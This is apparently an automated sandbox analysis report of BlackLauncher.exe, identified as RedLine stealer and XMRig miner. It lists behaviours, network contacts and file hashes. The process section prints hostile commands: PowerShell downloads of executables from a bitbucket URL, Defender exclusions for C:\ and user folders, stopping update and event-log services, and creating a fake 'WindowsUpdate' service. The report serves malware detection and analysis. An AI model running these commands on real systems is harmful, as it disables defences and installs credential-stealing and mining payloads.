Analysis Overview
SHA256
1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0
Threat Level: Known bad
The file BlackLauncher.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
xmrig
XMRig Miner payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Stops running service(s)
Blocklisted process makes network request
UPX packed file
Loads dropped DLL
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-13 19:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-13 19:04
Reported
2024-07-13 19:07
Platform
win10-20240611-en
Max time kernel
151s
Max time network
158s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Update\pROUy3v.exe | N/A |
| N/A | N/A | C:\ProgramData\Update\vdVaFs5.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows11\Updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Update\vdVaFs5.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Update\pROUy3v.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Windows11\Updater.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4304 set thread context of 1660 | N/A | C:\ProgramData\Update\vdVaFs5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 4724 set thread context of 3184 | N/A | C:\ProgramData\Windows11\Updater.exe | C:\Windows\system32\conhost.exe |
| PID 4724 set thread context of 4748 | N/A | C:\ProgramData\Windows11\Updater.exe | C:\Windows\system32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/AppData/Local/Temp/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "
C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'"
C:\ProgramData\Update\pROUy3v.exe
C:\ProgramData\Update\pROUy3v.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\ProgramData\Update\vdVaFs5.exe
C:\ProgramData\Update\vdVaFs5.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsUpdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsUpdate"
C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.135.65:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 65.135.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.77:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 77.28.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| CH | 185.196.9.26:6302 | | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 51.15.193.130:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 26.9.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 130.193.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpbmhpzc.tdf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\b8b300d8960ddf9f2e23f580909c77c774494a19eea0be58441e7393b5b6593c\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | a272a406be702b21b0b1a3382b88444a |
| SHA1 | bb2d40557e9e4d3db8f468b9d55c9abe5bbe33f3 |
| SHA256 | ee6193d85ae6e99d26669f1bdf5fdce7c2f38f38350341dc03783799941a9de6 |
| SHA512 | 64d62f434880eb4668ac01df9576ca6c2b7fa7a7e3b7ca8f92b4965ad5b1f1f3c0a129dc0dd5495b19f36e59c2b721443716279154b17d0a8a77e4177d94b1f4 |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\600540f4401230daf6f94143fce3c800b0bc15f0f3dcbb1d423709df581135ef\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | 6fe39f9e93796b6d34b5fbf30caa4d75 |
| SHA1 | 80ea777c8646f2edccad68e2f1f00c05ac084d51 |
| SHA256 | 8075b36b512f632fdc1cb2028c4c9a21d4f1baf9ff2f64dc4d3857f9edb1b0b4 |
| SHA512 | 992385567a2c8d679f03adaaa3025e9d37e21021e4684c7e5e0aa1f634150a89d6b054fa06914f8c534c2a91304358ef2018057c377477f9886065a19f41b150 |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\93783db0c338a2f64067c117bfba92aa04dd299bfe1fae15f2c90234aba6f117\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | a59a08a5a323b2188bb9c7ae3d55513b |
| SHA1 | b744cc17c893963b3a167a8594ac841b5008b96c |
| SHA256 | 1333f9d02221fe0423a43bcfe841ad8d63cc5212dc40a2589c63c108a019e4d9 |
| SHA512 | a1f089a437a7307e3287a2a58d8649708e6b8e8777ade8188202b51aebde981c74d1b95b3ab5cd1b613416a62236d08d5e80785159240c009fab32f9d734ffad |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25cc7fa9acdb035f977e2b8dd376530d |
| SHA1 | 66440c4ef643007c5b9aa99e8420b6e750c8de8f |
| SHA256 | eda1f76078f29ba768a8d27e70678ba7f16f346d232f95d1e8788df1ea1bb666 |
| SHA512 | f1b9cb79707a926089a97396db9ed2940875e6c2d97638208171e5114c7893e3ae26004cc6f45c9236f469d55dbc2077178df68704e445e624e06ea04ce89cfc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 910ec3e745c8acc38fab61b097f35b77 |
| SHA1 | 24ad6c3e786c32d0f819588cad86cd24a5fa9a6a |
| SHA256 | 4763872528910615d1b4d6726ac5a8c042fb8f2378ddf249a3ac267958f227f9 |
| SHA512 | a5d90ece095a405884e148a6d46ef9f1d96d95dc37ed7c215b4d9432534a86d4262081a412117105f6b0bf5eee6a504de1275e8661bfa718c5ef2ba6413387e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ce426674fa9f8557fc70959699b837fa |
| SHA1 | 13379f99e1d7e25537c4c85d3ef042d31baede92 |
| SHA256 | c7754795670afb3d3ece891195b184629b513a078fd5c78763d82693c6da3c8e |
| SHA512 | 6cd49aeb172324b9ef770958691c0b908a01e23bd03c3f75043b944e13e19294c830a16a33bb2e58bccc7ed1dc85fabc03847e2a843d42f3e925cafbd5275ee9 |
C:\ProgramData\Update\vdVaFs5.exe
| MD5 | ad2867dc002af2cca594f0b8202a1843 |
| SHA1 | 73b3ea99db621b71e7a4a13720c53ebe3a815521 |
| SHA256 | 2c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d |
| SHA512 | cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108 |
C:\ProgramData\Update\pROUy3v.exe
| MD5 | 61d3abff46a6bd2946925542c7d30397 |
| SHA1 | 1fed80a136e67a5b7b6846010a5853400886ee9c |
| SHA256 | b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa |
| SHA512 | e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 174ca7d96de1ececd15503f679acafb5 |
| SHA1 | 2290e1be0fff941e769cdda7c4907418e983c547 |
| SHA256 | d89963e1b500b9e9d62cdaf1f835496e6999c778d8e93578be90342e5560f171 |
| SHA512 | 896f54a8931a53f518f08255da0ff9ebcf36b3ceb14585bf3183fed281ea8aa883516a90f9b3403043fc071d66ea41d0b726055c36753b8b48996654a112fb2e |
\Users\Admin\AppData\Roaming\d3d9.dll
| MD5 | 106fe1980dbcb4fa2fe0c00b6d6fa7c2 |
| SHA1 | 5cb7eb7be8f3d1641cb458024d868363658a2955 |
| SHA256 | c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc |
| SHA512 | c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ff85f09f39c29eed17ea8954d5512aae |
| SHA1 | 10dee2e70802b552f752251e75bb678b91f0c172 |
| SHA256 | 47d3cba5e92ca1194a130906ab17b82e9a70670f4820be8a04cd619065a0edc6 |
| SHA512 | bdc3ec9f6cfe78112b2ef516955b8973a445fffc84215a5d0b883c98af5a5237b6fd31ad7f75bd783d2e413414e6b7be505aec0e3a4d38e2b8c0a6f1a526b3fe |